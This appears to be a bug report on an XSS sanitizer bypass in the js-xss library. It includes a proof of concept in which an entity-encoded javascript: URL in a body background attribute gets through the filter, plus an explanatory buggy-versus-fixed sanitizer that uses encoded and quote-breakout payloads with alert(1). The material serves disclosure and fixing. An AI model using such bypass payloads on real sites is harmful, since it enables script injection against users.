In safeAttrValue, we can see that friendlyAttrValue unescapes the attribute value: https://github.com/leizongmin/js-xss/blob/master/lib/default.js#L149

At the end of this function, however, the unescaped value is not "re-escaped", which results in the bypass of the check for XSS in background or style attributes.

Here is the PoC:

```js
var xss = require("xss");

// The attribute value is entity-encoded; it decodes to javascript:alert(1)
var html = "<body background=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;></body>";

// Allow only the background attribute on body
var options = {
  whiteList: {
    "body": ["background"]
  }
};

var output = xss(html, options);
console.log(output);
```

The above code emits the following HTML code:

```html
<body background="javascript:alert(1)"></body>
```

Since we should no longer care about Internet Explorer, this is not a big problem I think.
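To make the failure mode in this report concrete for maintainers, the following is an added example in plain JavaScript; it is not js-xss's own code and does not use the xss package. It models the bug class as a constructed sanitizer that runs its scheme check on the still-encoded value and then emits the decoded value without re-escaping, beside a corrected version that decodes first, checks the decoded form, and re-escapes before output. The function names (decodeEntities, escapeAttrValue, safeAttrValueBuggy, safeAttrValueFixed, renderAttr) and the sample inputs are assumptions constructed for this illustration.

```javascript
// Added example, not js-xss code. Illustrates "decode for inspection, emit
// decoded without re-escaping" and the corrected ordering.

// Decode numeric (&#106; / &#x6a;) and the basic named HTML entities.
// &amp; is handled last so "&amp;#106;" is not double-decoded.
function decodeEntities(str) {
  return str
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, "&");
}

// Escape the characters that can terminate a double-quoted attribute or
// open a new tag, so the value cannot break out of its context.
function escapeAttrValue(str) {
  return str
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Script URL schemes, tolerating whitespace between the letters.
const SCRIPT_URL = /(?:j\s*a\s*v\s*a|v\s*b|l\s*i\s*v\s*e)\s*s\s*c\s*r\s*i\s*p\s*t\s*:/i;

// Bug pattern (constructed): the scheme check runs on the raw, still
// entity-encoded value, which is then decoded and returned as-is.
function safeAttrValueBuggy(name, value) {
  if ((name === "background" || name === "style") && SCRIPT_URL.test(value)) {
    return "";
  }
  return decodeEntities(value); // decoded but never re-escaped
}

// Fixed ordering: decode, check the decoded form, re-escape before emitting.
function safeAttrValueFixed(name, value) {
  const decoded = decodeEntities(value);
  if ((name === "background" || name === "style") && SCRIPT_URL.test(decoded)) {
    return "";
  }
  return escapeAttrValue(decoded);
}

// Render one attribute as it would appear inside a tag (double-quoted).
function renderAttr(name, value, safeAttrValue) {
  return `${name}="${safeAttrValue(name, value)}"`;
}

// Constructed inputs: the entity-encoded javascript: URL from the PoC above,
// and a value whose decoded form carries a quote plus a new attribute.
const ENCODED_JS_URL =
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;" +
  "&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;";
const QUOTE_BREAKOUT = "x&quot; onload=&quot;alert(1)";

console.log(renderAttr("background", ENCODED_JS_URL, safeAttrValueBuggy)); // background="javascript:alert(1)"
console.log(renderAttr("background", ENCODED_JS_URL, safeAttrValueFixed)); // background=""
console.log(renderAttr("background", QUOTE_BREAKOUT, safeAttrValueBuggy)); // background="x" onload="alert(1)"
console.log(renderAttr("background", QUOTE_BREAKOUT, safeAttrValueFixed)); // background="x&quot; onload=&quot;alert(1)"
```

The second constructed input shows why the re-escape matters independently of the scheme check: even a value that contains no script URL can, once decoded and written back unescaped, close the attribute and introduce an event handler. The corrected function keeps the two concerns separate: the check always sees the decoded value, and the output is always escaped for the attribute context it is written into.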